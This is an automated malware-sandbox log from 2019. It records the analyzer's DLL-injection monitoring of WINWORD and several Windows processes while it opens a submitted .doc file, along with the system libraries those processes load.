Analysis

Category Package Started Completed Duration Log
FILE doc 2019-10-10 00:11:15 2019-10-10 00:15:06 231 seconds Show Log
  • Info: Behavioral log 1200.bson too big to be processed, skipped. Increase analysis_size_limit in cuckoo.conf
2019-10-10 01:11:15,000 [root] INFO: Date set to: 10-10-19, time set to: 00:11:15, timeout set to: 200
2019-10-10 01:11:15,000 [root] DEBUG: Starting analyzer from: C:\awvqohb
2019-10-10 01:11:15,000 [root] DEBUG: Storing results at: C:\yfIMibnsZc
2019-10-10 01:11:15,000 [root] DEBUG: Pipe server name: \\.\PIPE\AXWCoGty
2019-10-10 01:11:15,000 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:11:15,000 [root] INFO: Automatically selected analysis package "doc"
2019-10-10 01:11:15,467 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:11:15,467 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:11:15,467 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:11:16,170 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-10-10 01:11:16,170 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:11:16,184 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL option
2019-10-10 01:11:16,184 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL_64 option
2019-10-10 01:11:16,450 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" /q" with pid 1224
2019-10-10 01:11:16,450 [lib.api.process] INFO: 32-bit DLL to inject is C:\awvqohb\dll\JAenYpEs.dll, loader C:\awvqohb\bin\RHhipCm.exe
2019-10-10 01:11:16,466 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:16,466 [root] DEBUG: Loader: Injecting process 1224 (thread 1964) with C:\awvqohb\dll\JAenYpEs.dll.
2019-10-10 01:11:16,466 [root] DEBUG: Process image base: 0x2F9A0000
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\JAenYpEs.dll.
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2FAFD000 - 0x77110000
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: Allocated 0x178 bytes for new import table at 0x2FB00000.
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:16,466 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\JAenYpEs.dll.
2019-10-10 01:11:16,466 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1224
2019-10-10 01:11:18,477 [lib.api.process] INFO: Successfully resumed process with pid 1224
2019-10-10 01:11:18,477 [root] INFO: Added new process to list with pid: 1224
2019-10-10 01:11:18,493 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1224 at 0x747e0000, image base 0x2f9a0000, stack from 0x345000-0x350000
2019-10-10 01:11:18,555 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" \q.
2019-10-10 01:11:18,555 [root] INFO: Monitor successfully loaded in process with pid 1224.
2019-10-10 01:11:18,572 [root] DEBUG: DLL loaded at 0x748A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\Comctl32 (0x84000 bytes).
2019-10-10 01:11:18,711 [root] DEBUG: DLL loaded at 0x72770000: C:\Program Files (x86)\Microsoft Office\Office14\wwlib (0x127b000 bytes).
2019-10-10 01:11:18,711 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:11:18,743 [root] DEBUG: DLL loaded at 0x74390000: C:\Program Files (x86)\Microsoft Office\Office14\gfx (0x1ab000 bytes).
2019-10-10 01:11:18,743 [root] DEBUG: DLL loaded at 0x749C0000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2019-10-10 01:11:18,759 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-10-10 01:11:18,805 [root] DEBUG: DLL loaded at 0x713D0000: C:\Program Files (x86)\Microsoft Office\Office14\oart (0x1392000 bytes).
2019-10-10 01:11:18,977 [root] DEBUG: DLL loaded at 0x701E0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-10-10 01:11:19,009 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\system32\msi (0x240000 bytes).
2019-10-10 01:11:19,039 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:11:19,430 [root] DEBUG: DLL loaded at 0x73FB0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-10-10 01:11:19,460 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-10-10 01:11:19,539 [root] DEBUG: DLL loaded at 0x73AD0000: C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl (0xc9000 bytes).
2019-10-10 01:11:19,664 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:11:19,694 [root] DEBUG: DLL loaded at 0x70120000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS (0xbc000 bytes).
2019-10-10 01:11:19,757 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-10-10 01:11:19,867 [root] DEBUG: DLL loaded at 0x6FFD0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-10-10 01:11:19,881 [root] DEBUG: DLL loaded at 0x6BAA0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-10-10 01:11:19,898 [root] DEBUG: DLL loaded at 0x6B830000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-10-10 01:11:19,914 [root] INFO: Announced 32-bit process name:  pid: 80280815
2019-10-10 01:11:19,914 [lib.api.process] WARNING: The process with pid 80280815 is not alive, injection aborted
2019-10-10 01:11:19,914 [root] DEBUG: DLL loaded at 0x6B7E0000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-10-10 01:11:19,914 [root] DEBUG: set_caller_info: Adding region at 0x00560000 to caller regions list (kernel32::FindFirstFileExW).
2019-10-10 01:11:19,914 [root] DEBUG: set_caller_info: Adding region at 0x01E50000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:11:19,928 [root] DEBUG: DLL loaded at 0x6B760000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-10-10 01:11:20,069 [root] DEBUG: DLL loaded at 0x6B740000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-10-10 01:11:20,194 [root] DEBUG: DLL loaded at 0x6B720000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-10-10 01:11:20,319 [root] DEBUG: DLL loaded at 0x6B6C0000: C:\Windows\system32\Winspool.DRV (0x51000 bytes).
2019-10-10 01:11:20,381 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-10-10 01:11:20,413 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:11:20,413 [root] DEBUG: DLL loaded at 0x6B690000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:11:20,444 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:11:20,444 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:11:20,444 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:11:20,460 [root] DEBUG: DLL unloaded from 0x6B690000.
2019-10-10 01:11:20,615 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-10-10 01:11:20,615 [root] DEBUG: DLL unloaded from 0x2F9A0000.
2019-10-10 01:11:20,647 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:11:20,647 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:11:20,647 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:11:20,661 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:11:20,661 [root] DEBUG: DLL loaded at 0x6B5C0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:11:20,661 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:11:20,677 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:11:20,677 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:11:20,772 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:11:20,772 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:11:20,772 [root] DEBUG: DLL loaded at 0x6B5B0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:11:20,865 [root] DEBUG: DLL loaded at 0x6B450000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-10-10 01:11:21,020 [root] DEBUG: DLL loaded at 0x6B440000: C:\Windows\system32\profapi (0xb000 bytes).
2019-10-10 01:11:21,286 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-10-10 01:11:21,318 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:11:21,318 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:11:21,332 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-10-10 01:11:21,332 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:11:21,457 [root] DEBUG: DLL loaded at 0x6B200000: C:\Program Files (x86)\Microsoft Office\Office14\GKWord (0x238000 bytes).
2019-10-10 01:11:21,505 [root] DEBUG: DLL unloaded from 0x6B200000.
2019-10-10 01:11:21,598 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 3012
2019-10-10 01:11:21,598 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:21,614 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:21,614 [root] DEBUG: Loader: Injecting process 3012 (thread 1928) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [root] DEBUG: Process image base: 0x00000000FF8B0000
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF8C4000 - 0x000007FEFF430000
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x00000000FF8D0000.
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:21,614 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3012
2019-10-10 01:11:21,614 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 3012
2019-10-10 01:11:21,614 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:21,614 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:21,614 [root] DEBUG: Loader: Injecting process 3012 (thread 1928) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [root] DEBUG: Process image base: 0x00000000FF8B0000
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,630 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:11:21,630 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,630 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3012
2019-10-10 01:11:21,661 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:21,661 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:21,691 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:21,691 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:22,658 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:22,658 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3012 at 0x000000006B360000, image base 0x00000000FF8B0000, stack from 0x0000000000135000-0x0000000000140000
2019-10-10 01:11:22,658 [root] DEBUG: Commandline: C:\Windows\splwow64.exe 12288.
2019-10-10 01:11:22,658 [root] INFO: Added new process to list with pid: 3012
2019-10-10 01:11:22,658 [root] INFO: Monitor successfully loaded in process with pid 3012.
2019-10-10 01:11:23,673 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:11:23,673 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-10-10 01:11:23,937 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-10-10 01:11:23,953 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-10-10 01:11:23,970 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-10-10 01:11:23,970 [root] DEBUG: DLL unloaded from 0x6B6C0000.
2019-10-10 01:11:24,016 [root] DEBUG: DLL loaded at 0x000007FEF2ED0000: C:\Windows\system32\spool\DRIVERS\x64\3\unidrvui (0xdc000 bytes).
2019-10-10 01:11:24,032 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 01:11:24,048 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-10-10 01:11:24,141 [root] DEBUG: DLL loaded at 0x000007FEF9880000: C:\Windows\system32\spool\DRIVERS\x64\3\SendToOneNoteUI (0x12000 bytes).
2019-10-10 01:11:24,157 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,157 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,171 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,187 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,234 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,234 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,250 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,266 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,282 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,312 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,328 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,344 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,359 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,359 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,375 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,405 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,405 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,421 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,437 [root] DEBUG: DLL loaded at 0x000007FEF2E10000: C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv (0xb2000 bytes).
2019-10-10 01:11:24,469 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,516 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-10-10 01:11:24,562 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,562 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,562 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,578 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,578 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,594 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,594 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,625 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,625 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,937 [root] DEBUG: DLL loaded at 0x6B2C0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10 (0x9e000 bytes).
2019-10-10 01:11:25,092 [root] DEBUG: DLL loaded at 0x6B190000: C:\Windows\SysWOW64\FM20 (0x12c000 bytes).
2019-10-10 01:11:25,092 [root] DEBUG: DLL loaded at 0x750B0000: C:\Windows\syswow64\COMDLG32 (0x7b000 bytes).
2019-10-10 01:11:25,124 [root] DEBUG: set_caller_info: Adding region at 0x00250000 to caller regions list (ntdll::LdrLoadDll).
2019-10-10 01:11:25,388 [root] DEBUG: DLL loaded at 0x6B130000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-10-10 01:11:25,436 [root] DEBUG: DLL loaded at 0x6AEA0000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-10-10 01:11:25,467 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-10-10 01:11:25,467 [root] DEBUG: set_caller_info: Adding region at 0x07C70000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:25,497 [root] DEBUG: DLL loaded at 0x6AE70000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-10-10 01:11:25,497 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-10-10 01:11:25,497 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:25,497 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:25,497 [root] DEBUG: Loader: Injecting process 1632 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:25,497 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:11:25,513 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:25,513 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:25,513 [root] DEBUG: set_caller_info: Adding region at 0x07C80000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:11:25,513 [root] DEBUG: set_caller_info: Adding region at 0x00120000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:11:25,513 [root] DEBUG: set_caller_info: Adding region at 0x054F0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:25,529 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:25,529 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:25,545 [root] DEBUG: set_caller_info: Adding region at 0x00010000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:11:25,545 [root] DEBUG: set_caller_info: Adding region at 0x006F0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:25,545 [root] DEBUG: set_caller_info: Adding region at 0x00350000 to caller regions list (advapi32::RegCloseKey).
2019-10-10 01:11:25,592 [root] DEBUG: set_caller_info: Adding region at 0x07920000 to caller regions list (kernel32::GetLocalTime).
2019-10-10 01:11:25,592 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x000000006B360000, image base 0x00000000FF900000, stack from 0x0000000006A32000-0x0000000006A40000
2019-10-10 01:11:25,592 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 01:11:25,592 [root] INFO: Added new process to list with pid: 1632
2019-10-10 01:11:25,592 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-10-10 01:11:25,592 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:11:25,592 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:11:25,592 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:26,263 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6060000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-10-10 01:11:26,309 [root] DEBUG: set_caller_info: Adding region at 0x009C0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:26,355 [root] DEBUG: DLL loaded at 0x6AE60000: C:\Windows\SysWOW64\fm20ENU (0x8000 bytes).
2019-10-10 01:11:26,418 [root] DEBUG: set_caller_info: Adding region at 0x03880000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:11:26,792 [root] DEBUG: DLL loaded at 0x6AE20000: C:\Windows\system32\wbem\wbemdisp (0x31000 bytes).
2019-10-10 01:11:26,823 [root] DEBUG: DLL loaded at 0x6ADC0000: C:\Windows\system32\wbemcomn (0x5c000 bytes).
2019-10-10 01:11:26,839 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-10-10 01:11:26,839 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-10-10 01:11:27,012 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4AD0000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4AF0000 to caller regions list (advapi32::OpenSCManagerW).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:34,608 [root] INFO: Stopped WMI Service
2019-10-10 01:11:34,608 [root] INFO: Attaching to DcomLaunch service (pid 564)
2019-10-10 01:11:34,608 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:34,624 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:34,624 [root] DEBUG: Loader: Injecting process 564 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:34,624 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 568, handle 0x84
2019-10-10 01:11:34,624 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 01:11:34,624 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 01:11:34,624 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 01:11:34,624 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:34,624 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:34,624 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:34,624 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:34,624 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 564 at 0x000000006B360000, image base 0x00000000FFA10000, stack from 0x0000000002286000-0x0000000002290000
2019-10-10 01:11:34,624 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k DcomLaunch.
2019-10-10 01:11:34,624 [root] INFO: Added new process to list with pid: 564
2019-10-10 01:11:34,624 [root] INFO: Monitor successfully loaded in process with pid 564.
2019-10-10 01:11:34,624 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:11:34,624 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:11:34,640 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:38,726 [root] INFO: Started WMI Service
2019-10-10 01:11:38,726 [root] INFO: Attaching to WMI service (pid 1200)
2019-10-10 01:11:38,726 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:38,743 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:38,743 [root] DEBUG: Loader: Injecting process 1200 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:38,743 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:11:38,743 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:38,743 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:38,743 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:38,743 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:38,743 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1200 at 0x000000006B360000, image base 0x00000000FFA10000, stack from 0x0000000001366000-0x0000000001370000
2019-10-10 01:11:38,757 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-10-10 01:11:38,757 [root] INFO: Added new process to list with pid: 1200
2019-10-10 01:11:38,757 [root] INFO: Monitor successfully loaded in process with pid 1200.
2019-10-10 01:11:38,757 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:11:38,757 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:11:38,757 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:40,802 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:11:40,818 [root] DEBUG: DLL loaded at 0x73AA0000: C:\Windows\system32\wbem\wbemprox (0xa000 bytes).
